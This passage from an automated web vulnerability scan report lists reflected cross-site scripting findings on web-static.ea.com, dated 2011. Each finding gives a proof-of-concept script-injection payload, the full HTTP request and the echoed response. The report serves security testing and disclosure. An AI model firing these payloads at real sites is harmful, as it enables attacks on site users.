<link rel="canonical" href="http://www.ea.com/us/portal/images/site_logos/c75d4"><script>alert(1)</script>0fd901df3a2" />
...[SNIP]...
4.124. http://web-static.ea.com/us/portal/images/site_logos/ea_sports.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/site_logos/ea_sports.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21539"><script>alert(1)</script>24d9a87f4b5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/site_logos/21539"><script>alert(1)</script>24d9a87f4b5?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30494
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:18 GMT
Date: Fri, 24 Jun 2011 14:09:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/site_logos/21539"><script>alert(1)</script>24d9a87f4b5" />
...[SNIP]...
4.125. http://web-static.ea.com/us/portal/images/site_logos/nfs.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/site_logos/nfs.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e7ed"><script>alert(1)</script>3d841534c94 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/site_logos/3e7ed"><script>alert(1)</script>3d841534c94?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30494
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:19 GMT
Date: Fri, 24 Jun 2011 14:09:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/site_logos/3e7ed"><script>alert(1)</script>3d841534c94" />
...[SNIP]...
4.126. http://web-static.ea.com/us/portal/images/site_logos/pogo.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/site_logos/pogo.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e953"><script>alert(1)</script>e7214181ec6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/site_logos/6e953"><script>alert(1)</script>e7214181ec6?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30494
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:19 GMT
Date: Fri, 24 Jun 2011 14:09:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/site_logos/6e953"><script>alert(1)</script>e7214181ec6" />
...[SNIP]...
4.127. http://web-static.ea.com/us/portal/images/site_logos/sims.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/site_logos/sims.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcf00"><script>alert(1)</script>8a1fb1ce8fa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/site_logos/fcf00"><script>alert(1)</script>8a1fb1ce8fa?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30494
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:18 GMT
Date: Fri, 24 Jun 2011 14:09:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/site_logos/fcf00"><script>alert(1)</script>8a1fb1ce8fa" />
...[SNIP]...
4.128. http://web-static.ea.com/us/portal/js/ea/Framework.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/ea/Framework.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57c28"><script>alert(1)</script>4871129af1a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/ea/57c28"><script>alert(1)</script>4871129af1a?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30482
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:16 GMT
Date: Fri, 24 Jun 2011 14:09:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/ea/57c28"><script>alert(1)</script>4871129af1a" />
...[SNIP]...
4.129. http://web-static.ea.com/us/portal/js/ea/ShoppingCartService.jQuery.JSON-1.3.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/ea/ShoppingCartService.jQuery.JSON-1.3.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba4be"><script>alert(1)</script>9ae99465936 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/ea/ba4be"><script>alert(1)</script>9ae99465936?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30481
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:50 GMT
Date: Fri, 24 Jun 2011 13:43:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/ea/ba4be"><script>alert(1)</script>9ae99465936" />
...[SNIP]...
4.130. http://web-static.ea.com/us/portal/js/jquery/jquery-1.2.6.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery-1.2.6.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a68c5"><script>alert(1)</script>c2a6993d28f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/a68c5"><script>alert(1)</script>c2a6993d28f?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/a68c5"><script>alert(1)</script>c2a6993d28f" />
...[SNIP]...
4.131. http://web-static.ea.com/us/portal/js/jquery/jquery-1.4.2.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery-1.4.2.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42c42"><script>alert(1)</script>f68c539e57e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/42c42"><script>alert(1)</script>f68c539e57e?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:16 GMT
Date: Fri, 24 Jun 2011 14:09:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/42c42"><script>alert(1)</script>f68c539e57e" />
...[SNIP]...
4.132. http://web-static.ea.com/us/portal/js/jquery/jquery-easing-1.3.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery-easing-1.3.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 992d6"><script>alert(1)</script>04ea07e99ad was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/992d6"><script>alert(1)</script>04ea07e99ad?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/992d6"><script>alert(1)</script>04ea07e99ad" />
...[SNIP]...
4.133. http://web-static.ea.com/us/portal/js/jquery/jquery-facebox-1.2.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery-facebox-1.2.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d74d6"><script>alert(1)</script>89130c28a50 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/d74d6"><script>alert(1)</script>89130c28a50?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:16 GMT
Date: Fri, 24 Jun 2011 14:09:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/d74d6"><script>alert(1)</script>89130c28a50" />
...[SNIP]...
4.134. http://web-static.ea.com/us/portal/js/jquery/jquery-ui-personalized-1.5.3.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery-ui-personalized-1.5.3.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82fd8"><script>alert(1)</script>6436305a584 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/82fd8"><script>alert(1)</script>6436305a584?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/82fd8"><script>alert(1)</script>6436305a584" />
...[SNIP]...
4.135. http://web-static.ea.com/us/portal/js/jquery/jquery.checkbox.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.checkbox.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d279"><script>alert(1)</script>6cb44f2e4b0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/1d279"><script>alert(1)</script>6cb44f2e4b0?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:50 GMT
Date: Fri, 24 Jun 2011 13:43:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/1d279"><script>alert(1)</script>6cb44f2e4b0" />
...[SNIP]...
4.136. http://web-static.ea.com/us/portal/js/jquery/jquery.dynamic-drop.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.dynamic-drop.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc7d8"><script>alert(1)</script>8ca3aee7304 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/fc7d8"><script>alert(1)</script>8ca3aee7304?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:52 GMT
Date: Fri, 24 Jun 2011 13:43:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/fc7d8"><script>alert(1)</script>8ca3aee7304" />
...[SNIP]...
4.137. http://web-static.ea.com/us/portal/js/jquery/jquery.equalizecols.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.equalizecols.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac7f6"><script>alert(1)</script>889bf917fb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/ac7f6"><script>alert(1)</script>889bf917fb?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/ac7f6"><script>alert(1)</script>889bf917fb" />
...[SNIP]...
4.138. http://web-static.ea.com/us/portal/js/jquery/jquery.eventcalendar.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.eventcalendar.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a367c"><script>alert(1)</script>ae4ac210b80 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/a367c"><script>alert(1)</script>ae4ac210b80?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:49 GMT
Date: Fri, 24 Jun 2011 13:43:49 GMT
Connection: close

